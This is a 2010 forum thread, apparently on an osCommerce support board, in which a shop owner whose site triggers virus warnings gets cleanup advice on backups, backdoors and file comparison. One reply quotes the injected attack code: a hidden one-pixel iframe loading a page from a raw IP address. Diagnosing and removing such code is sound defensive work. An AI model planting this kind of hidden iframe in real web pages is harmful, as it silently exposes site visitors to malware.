11 replies to this topic

[sjnewbie]

Hi Guys,

I've got customers who said Trojan/Virus Alert automatically came up when they browsed my website. Some customers said my 'Contact Us' bounced back when they filled in the enquiry.

Can any of you guys check this out for me?

I've got my website hacked a while ago and have implimented most security stuff that I could manage to do myself. I thought that was enough cos I didn't notice any problem on my end.

My website is on here.

Thanks for your time and advice in advance!

[germ]

In the source code of the index page:

<iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>

I'd say you're still in a "state of hack".

[sjnewbie]

Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking?

Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters.

Any suggestion as to where to start please?

[germ]

sjnewbie, on 24 February 2010, 17:36, said:

Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking?

Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters.

Any suggestion as to where to start please?

How to Secure Your Site

[spooks]

Remember hackers often leave hidden files/back doors etc so even if you remove the obvious & close the hole they used first, they can still get back in.

Your best bet after any hack is to get host to wipe site & restore with your clean backup, then add security b4 going back live.


If you have no clean backups you may have to resort to going back to your original files.


Unfortunatly too many ignore the rule ALWAYS KEEP BACKUPs, and regret that only when its too late.

[sjnewbie]

Thanks! I've gone through most in that thread last time.

I've done the search and learnt that I need to remove the line you picked up from all my php files. Is there an easier way of spotting them throughout all my files or going through each php file one by one is the only option?

[sjnewbie]

I see.. I've done the regular back up but the thing is I don't know how far I need to go back. Don't know exactly when the website was hacked so which back up I have is a clean one to use.

Starting from scratch is just not imaginable. Did learn and implimented many contributions. Can't even remember how to do them again so have to learn them all over again. Time is not in my favour at the moment

Edited by sjnewbie, 24 February 2010, 18:25.

[sjnewbie]

I just feel it would be much faster to try and get rid of files. Is it impossible to spot hidden files/back doors?

[spooks]

sjnewbie, on 24 February 2010, 18:26, said:

I just feel it would be much faster to try and get rid of files. Is it impossible to spot hidden files/back doors?

Possibly the easyest way to spot hacked files is with ftp, use that to compare last changed date on your local files with the server version, if there is a varience then examine the suspect file.


If you read through the thread on the base64 attack, that refers to a util to search your files for a paticular bit of code.


But remember my warning on hidden files/folders or even some you won't be able to delete!!

[sjnewbie]

Okay thank you very much!

I will focus on the obvious ones for now - one at a time. Hopefully, will spend time and make over at some point. Just hate to think it may affect my customers in any negative way - their email, ID and password being mis-used or such. Hope this is not the case.

Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website?

[spooks]

sjnewbie, on 24 February 2010, 18:53, said:

Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website?

Rather than ask ask others to risk infection with your virus, you should check that your self.

backup your site with Backup of all store files in zip format http://addons.oscommerce.com/info/6986 or similar, then scan the uploaded file, if your pc AV software aint up to it, use one of the many online services.

[sjnewbie]

I was actually concerned about risking others but assumed they would have a necessary software to block it

Thanks again for all your help. Much appreciated!